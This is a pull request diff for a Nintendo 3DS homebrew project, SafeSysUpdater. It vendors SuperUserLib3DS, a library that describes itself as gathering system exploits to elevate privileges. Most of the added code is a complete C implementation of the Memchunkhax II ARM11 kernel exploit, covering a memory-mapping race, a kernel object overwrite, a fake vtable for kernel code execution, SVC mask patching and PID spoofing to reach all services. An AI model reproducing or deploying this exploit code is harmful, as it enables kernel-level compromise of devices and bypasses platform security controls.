### PR TITLE
Revert "SuperUserLib3DS: using submodule"

### DIFF
--- a/.gitmodules
+++ b/.gitmodules
@@ -1,3 +1,0 @@
-[submodule "source/SuperUserLib3DS"]
-	path = source/SuperUserLib3DS
-	url = https://github.com/delebile/SuperUserLib3DS

--- a/source/SuperUserLib3DS/LICENSE.txt
+++ b/source/SuperUserLib3DS/LICENSE.txt
@@ -1,0 +1,7 @@
+Copyright (C) 2015 Jason Dellaluce, Steveice10 for part of his code
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

--- a/source/SuperUserLib3DS/README.md
+++ b/source/SuperUserLib3DS/README.md
@@ -1,0 +1,26 @@
+# Lib SuperUser for Nintendo 3DS
+
+## What this is
+
+This lib is meant to gather various exploits of the system and use them to offer the user an elevation of his privileges over the console, from ARM11 and hopefully ARM9 side.
+
+The term takes inspiration from the administrator privileged user nickname for UNIX systems.
+
+It is currently a work in progress project, that will be implementing new exploits when they will be public available, trying to support
+the latest system version possible.
+
+## Stability
+
+The library itself should not cause any brick, but i do not own any responsability of the use anyone makes of it.
+
+The bootrate of the exploits is right now pretty reliable, but the app fails to return to the Homebrew Launcher.
+
+## Exploits Used
+
+Target | Exploit name | Support | Credits
+------------ | ------------- | ------------- | -------------
+ARM11 Kernel | Memchunkhax II | All 3DSes Ver. <= 10.3 | Reproduction of the exploit presented [here](https://media.ccc.de/v/32c3-7240-console_hacking). Credit goes so to derrek, smea and plutoo, while this implementation has been realized with the help of Steveice10, julian20, MassExplosion, TuxSH and motezazer.
+
+
+
+

--- a/source/SuperUserLib3DS/libsu.c
+++ b/source/SuperUserLib3DS/libsu.c
@@ -1,0 +1,273 @@
+#include "libsu.h"
+#include <3ds.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#ifdef SUDEBUG
+	#define debugPrint(...) 		printf(__VA_ARGS__)
+	#define debugPrintError(...) 	({printf(__VA_ARGS__); return -1;})
+#else
+	#define debugPrint(...) 
+	#define debugPrintError(...) 	({return -1;})
+#endif
+
+static u8 isNew3DS = 0;
+
+// Exploits functions that will be used later
+int memchunkhax2();
+
+int suInit()
+{
+	APT_CheckNew3DS(&isNew3DS);
+	debugPrint("ARM11 Kernel Exploit\n");
+	
+	int res = memchunkhax2();
+	if(!res) 
+		debugPrint("Success!\n");
+	else
+		debugPrint("Failure! :(\n");
+	
+	return res;
+}
+
+/*
+	----- EXPLOITS DEDICATED AREA -----
+*/
+
+// 		MEMCHUNKHAX II AREA
+#define SLABHEAP_VIRTUAL	0xFFF70000
+#define SLABHEAP_PHYSICAL 	0x1FFA0000
+#define KERNEL_SHIFT		0x40000000
+#define PAGE_SIZE 			0x1000
+
+#define waitUserlandAccessible(x) while((u32) svcArbitrateAddress(arbiter, x, ARBITRATION_WAIT_IF_LESS_THAN_TIMEOUT, 0, 0) == 0xD9001814)
+
+typedef struct {
+	u32 size;
+	void* next;
+	void* prev;
+} MemChunkHdr;
+
+typedef struct {
+	u32 addr;
+	u32 size;
+	Result result;
+} AllocateData;
+
+extern u32 __ctru_heap;
+extern u32 __ctru_heap_size;
+volatile u32 kernelHacked = -1;
+volatile u32 pidBackup = 0;
+
+static void patchPID()
+{
+	// Patch PID in order access all services
+	__asm__ volatile("cpsid aif");
+	u8* KProcess = (u8*) *((u32*)0xFFFF9004);
+	pidBackup = *((u32*)(KProcess + (isNew3DS ? 0xBC : 0xB4)));
+	*((u32*)(KProcess + (isNew3DS ? 0xBC : 0xB4))) = 0;
+}
+
+static void unpatchPID()
+{
+	// Restore what we changed
+	__asm__ volatile("cpsid aif");
+	u8* KProcess = (u8*) *((u32*)0xFFFF9004);
+	*((u32*)(KProcess + (isNew3DS ? 0xBC : 0xB4))) = pidBackup;
+}
+
+void patchServiceAccess()
+{
+	// Set the current process id (PID) to 0
+	svcBackdoor((void*)&patchPID);
+	
+	// Re-initialize srv connection. It will consider this the process with id 0
+	// so we will have access to any service
+	srvExit();
+	srvInit();
+	
+	// Once we tricked srv we can restore the real PID
+	svcBackdoor((void*)&unpatchPID);
+}
+
+static void kernel_entry()
+{
+	// Patch SVC access control mask to allow everyone of them
+	
+	// First patch the KProcess, for new threads
+	u8* KProcess = (u8*) *((u32*)0xFFFF9004);
+	u8* svcMask = KProcess + (isNew3DS ? 0x90 : 0x88);
+	for(int i = 0; i < 0x10; i++)	
+		*(svcMask + i) = 0xFF;
+	
+	// Then patch the KThread
+	u8* KThread = (u8*) *((u32*)0xFFFF9000);
+	svcMask = (u8*) *((u32*)(KThread + 0x8C)) - 0xC8;
+	for(int i = 0; i < 0x10; i++)	
+		*(svcMask + i) = 0xFF;
+	
+	// Give feedback to the userland side
+	kernelHacked = 0;
+}
+
+// Thread function to slow down svcControlMemory execution.
+static void delay_thread(void* arg)
+{
+	AllocateData* data = (AllocateData*)arg;
+
+	// Slow down thread execution until the control operation has completed.
+	while(data->result == -1)
+		svcSleepThread(10000);
+}
+
+// Thread function to allocate memory pages.
+static void allocate_thread(void* arg)
+{
+	AllocateData* data = (AllocateData*)arg;
+
+	// Allocate the requested pages.
+	data->result = svcControlMemory(&data->addr, data->addr, 0, data->size, MEMOP_ALLOC, (MemPerm) (MEMPERM_READ | MEMPERM_WRITE));
+}
+
+// Creates an event and outputs its kernel object address (at ref count, not vtable pointer) from r2.
+static Result __attribute__((naked)) svcCreateEventKAddr(Handle* event, u8 reset_type, u32* kaddr)
+{
+	asm volatile(
+		"str r0, [sp, #-4]!\n"
+		"str r2, [sp, #-4]!\n"
+		"svc 0x17\n"
+		"ldr r3, [sp], #4\n"
+		"str r2, [r3]\n"
+		"ldr r3, [sp], #4\n"
+		"str r1, [r3]\n"
+		"bx lr"
+	);
+}
+
+int memchunkhax2()
+{
+	Handle arbiter = __sync_get_arbiter();
+	u32 isolatedPage = 0;
+	u32 isolatingPage = 0;
+	Handle kObjHandle = 0;
+	u32 kObjAddr = 0;
+	Thread delayThread = NULL;
+	Result res;
+	
+	debugPrint("#1 : Allocating buffers...\n");
+	AllocateData* data = (AllocateData*)malloc(sizeof(AllocateData));
+	if(!data)
+		debugPrintError("ERROR : Can't allocate data.\n");
+	data->addr = __ctru_heap + __ctru_heap_size;
+	data->size = PAGE_SIZE * 2;
+	data->result = -1;
+	
+	void** vtable = (void**)linearAlloc(16 * sizeof(u32));
+	if(!vtable)
+		debugPrintError("ERROR : Can't allocate data.\n");
+	for(int i = 0; i < 16; i++)
+		vtable[i] = kernel_entry;
+	
+	void* backup = malloc(PAGE_SIZE);
+	if(!backup)
+		debugPrintError("ERROR : Can't allocate data.\n");
+	
+	debugPrint("#2 : Allocating pages...\n");
+	// Makes all the threads be on core 1
+	aptOpenSession();
+	if(APT_SetAppCpuTimeLimit(30) != 0)
+		debugPrintError("ERROR : Can't force threads to core 1.\n");
+	aptCloseSession();
+	
+	res = svcControlMemory(&isolatedPage, data->addr + data->size, 0, PAGE_SIZE, MEMOP_ALLOC, (MemPerm) (MEMPERM_READ | MEMPERM_WRITE));
+	if(!res)
+		res = svcControlMemory(&isolatingPage, isolatedPage + PAGE_SIZE, 0, PAGE_SIZE, MEMOP_ALLOC, (MemPerm) (MEMPERM_READ | MEMPERM_WRITE));
+	if(!res)
+		res = svcControlMemory(&isolatedPage, isolatedPage, 0, PAGE_SIZE, MEMOP_FREE, MEMPERM_DONTCARE);
+	if(res != 0)
+		debugPrintError("ERROR : Can't allocate pages.\n");
+	
+	isolatedPage = 0;
+	
+	// Create a KSynchronizationObject in order to use part of its data as a fake memory block header.
+	// Within the KSynchronizationObject, refCount = size, syncedThreads = next, firstThreadNode = prev.
+	// Prev does not matter, as any verification happens prior to the overwrite.
+	// However, next must be 0, as it does not use size to check when allocation is finished.
+	if(svcCreateEventKAddr(&kObjHandle, 0, &kObjAddr) != 0)
+		debugPrintError("ERROR : Can't create kernel object.\n");
+	
+	// Consider the physical address of the kobject, preventing the kernel shift.
+	kObjAddr = kObjAddr - SLABHEAP_VIRTUAL + SLABHEAP_PHYSICAL - KERNEL_SHIFT;
+	
+	debugPrint("#3 : Map SlabHeap in userland...\n");
+	// Create thread to slow down svcControlMemory execution and another to allocate the pages.
+	delayThread = threadCreate(delay_thread, data, 0x4000, 0x18, 1, true);
+	if(!delayThread)
+		debugPrintError("ERROR : Can't create delaying thread.\n");
+		
+	if(!threadCreate(allocate_thread, data, 0x4000, 0x3F, 1, true))
+		debugPrintError("ERROR : Can't create allocating thread.\n");
+	
+	waitUserlandAccessible(data->addr);	// This oracle will tell us exactly when we can write in memory.
+	((MemChunkHdr*) data->addr)->next = (MemChunkHdr*) kObjAddr;   // Edit the memchunk to redirect mem mapping.
+	
+	// Perform a backup of the kernel page (or at least for what we can)
+	waitUserlandAccessible(data->addr + PAGE_SIZE + (kObjAddr & 0xFFF)); 
+	memcpy(backup, (void*) (data->addr + PAGE_SIZE + (kObjAddr & 0xFFF) ), PAGE_SIZE - (kObjAddr & 0xFFF));
+	if(data->result != -1)
+		debugPrintError("ERROR : Race condition failed.\n");
+	
+	debugPrint("#4 : Overwrite completed...\n");
+	// Wait for memory mapping to complete.
+	while(data->result == -1)
+		svcSleepThread(1000000);
+	if(data->result != 0)
+		debugPrintError("ERROR : Failed memory mapping.\n");
+	
+	debugPrint("#5 : Restoring SlabHeap backup...\n");
+	// Restore the kernel memory backup first
+	memcpy((void*) (data->addr + PAGE_SIZE + (kObjAddr & 0xFFF)), backup, PAGE_SIZE - (kObjAddr & 0xFFF));
+	
+	debugPrint("#6 : Setup fake vtable and release object...\n");
+	//waitUserlandAccessible(data->addr + PAGE_SIZE + (kObjAddr & 0xFFF) - 4); 
+	*(void***) (data->addr + PAGE_SIZE + (kObjAddr & 0xFFF) - 4) = vtable;
+	
+	// With this the kernel should run our code
+	if(kObjHandle != 0)
+		svcCloseHandle(kObjHandle);
+
+	debugPrint("#7 : Clean memory...\n");
+	if(data != NULL && data->result == 0)
+		svcControlMemory(&data->addr, data->addr, 0, data->size, MEMOP_FREE, MEMPERM_DONTCARE);
+
+	// Stop the delaying thread
+	if(delayThread != NULL && data != NULL && data->result == -1)
+		data->result = 0;
+
+	if(isolatedPage != 0) {
+		svcControlMemory(&isolatedPage, isolatedPage, 0, PAGE_SIZE, MEMOP_FREE, MEMPERM_DONTCARE);
+		isolatedPage = 0;
+	}
+
+	if(isolatingPage != 0) {
+		svcControlMemory(&isolatingPage, isolatingPage, 0, PAGE_SIZE, MEMOP_FREE, MEMPERM_DONTCARE);
+		isolatingPage = 0;
+	}
+
+	if(backup)
+		free(backup);
+	if(data)
+		free(data);
+	if(vtable)
+		linearFree(vtable);
+
+	while(kernelHacked != 0)
+		svcSleepThread(1000000);
+	debugPrint("#8 : Grant access to all services...\n");
+	patchServiceAccess();
+	svcSleepThread(0x4000000LL);
+	APT_SetAppCpuTimeLimit(80);
+	return 0;
+}
+//		END OF MEMCHUNKHAX II AREA

--- a/source/SuperUserLib3DS/libsu.h
+++ b/source/SuperUserLib3DS/libsu.h
@@ -1,0 +1,46 @@
+/*
+	Copyright (C) 2015 Jason Dellaluce
+	Lib SuperUser for Nintendo 3DS
+	
+	This lib is meant to gather various exploits of the system
+	and use them to offer the user an elevation of his privilegses
+	over the console.
+	
+	Exploits used :
+		- Memchunkhax II : An implementation of what derrek, plutoo
+		and smea showed here:
+		https://media.ccc.de/v/32c3-7240-console_hacking
+			realized with the help of Steveice10, julian20, MassExplosion,
+			motezazer, TuxSH.
+	
+	Success rate :
+		Still unstable, but with a reliability around 80%.
+		The app crashes when returning to Homebrew Launcher or when
+		shutting down the process, probably becouse of the corruption of
+		kernel objects.
+		
+	Firmware compatibility:
+		ARM11 Kernel:
+			Memchunkhax II -> New3DS, Old3DS, 2DS on System Version <= 10.3
+*/
+
+// Comment this in order to not show the exploit progress.
+//#define SUDEBUG
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+
+/*	
+	Library initialization, will gain access to all syscalls, all services,
+	and the ARM11 Kernel.
+*/
+int suInit();
+
+
+
+#ifdef __cplusplus
+}
+#endif
+


### PR DESCRIPTION
Reverts Cpasjuste/SafeSysUpdater#3

It's seem to create building error (personally tested)
